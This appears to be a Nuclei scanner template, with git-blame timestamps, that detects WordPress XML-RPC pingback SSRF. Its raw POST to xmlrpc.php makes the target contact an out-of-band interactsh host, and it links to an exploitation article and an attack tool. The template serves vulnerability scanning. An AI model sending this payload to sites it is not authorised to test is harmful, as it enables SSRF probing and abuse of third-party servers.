2021-09-21 09:48:49 +00:00
|
|
|
id: wp-xmlrpc-pingback-detection
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Wordpress XMLRPC Pingback detection
|
|
|
|
author: pdteam
|
|
|
|
severity: info
|
|
|
|
reference:
|
|
|
|
- https://github.com/dorkerdevil/rpckiller
|
|
|
|
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: wordpress,ssrf,oast,xmlrpc
|
2021-09-21 09:48:49 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /xmlrpc.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
<methodCall>
|
|
|
|
<methodName>pingback.ping</methodName>
|
|
|
|
<params>
|
|
|
|
<param>
|
|
|
|
<value>
|
|
|
|
<string>http://{{interactsh-url}}</string>
|
|
|
|
</value>
|
|
|
|
</param>
|
|
|
|
<param>
|
|
|
|
<value>
|
|
|
|
<string>{{BaseURL}}/?p=1</string>
|
|
|
|
</value>
|
|
|
|
</param>
|
|
|
|
</params>
|
|
|
|
</methodCall>
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|